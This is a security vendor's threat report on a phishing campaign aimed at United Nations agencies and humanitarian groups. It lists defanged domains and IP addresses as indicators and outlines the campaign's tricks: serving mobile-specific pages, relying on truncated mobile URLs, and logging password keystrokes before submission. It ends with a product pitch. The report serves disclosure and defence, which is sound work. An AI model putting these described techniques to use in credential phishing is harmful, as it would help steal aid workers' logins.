Phishing attack targeting United Nations and humanitarian organizations discovered by Lookout Phishing AI

TL; DR:

Lookout Phishing AI has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations, such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but as of the publication of this blog the attack is still ongoing.                     

Background on the phishing campaign

The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.

Mobile-Aware functionality and key logging

Lookout has identified several noteworthy techniques employed in this campaign, including its ability to detect mobile devices and to log keystrokes directly as they are entered in the password field.

Specifically, Javascript code logic on the phishing pages detects if the page is being loaded on a mobile device and delivers mobile-specific content in that case. Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception.

Lookout has also collected evidence of key logging functionality embedded in the password field of the phishing login pages, such that, if a target doesn’t complete the login activity by pressing the login button or if they enter another, unintended password, this information is still sent back to the command and control infrastructure operated by the malicious actor.

SSL certificates and humanitarian aid domains

All major browsers will alert users about the use of expired SSL certificates. As these warnings are very clear (and in fact often hard to dismiss) it would be near impossible to entice a user to enter their login credentials on a site that uses an expired certificate. As a result, expired SSL certificates observed on some of the phishing sites can provide insight into the time period of the attack.

SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. Currently six certificates are still valid, and Lookout suspects that these attacks may still be ongoing. A table at the end of this blog shows the targeted organizations, the URLs targeting them as well as whether the current SSL certificate on the site is valid as of writing this report.

A sample of one of the live phishing sites discovered by Lookout researchers. Top: The legitimate login page targeted by this phishing attack. Bottom: The phishing site mimicking the legitimate Office365 login page for employees of the International Federation of Red Cross and Red Crescent Societies.

Lookout Phishing and Content Protection

The mobile-aware component found in this campaign is further proof that phishing attacks have evolved to target mobile devices. Mobile phishing has emerged as a source of increasing risk for enterprises, as the post-perimeter world and widespread adoption of bring your own device (BYOD) policies blurs the lines between personal devices and corporate networks, not to mention the expanded multi-channel threat surface presented by such devices and mobility as a whole.

Lookout Phishing & Content Protection goes beyond traditional phishing channels and detects phishing attacks from all types of sources, including personal and corporate email, social media, SMS and other messaging and apps. Lookout also detects access to malicious sites, including malware and spyware distribution, command and control servers, and botnets — from URLs delivered by any app or channel on a user’s device.

Hear why  phishing attacks are only getting more sophisticated.

Lookout delivers endpoint-to-cloud Security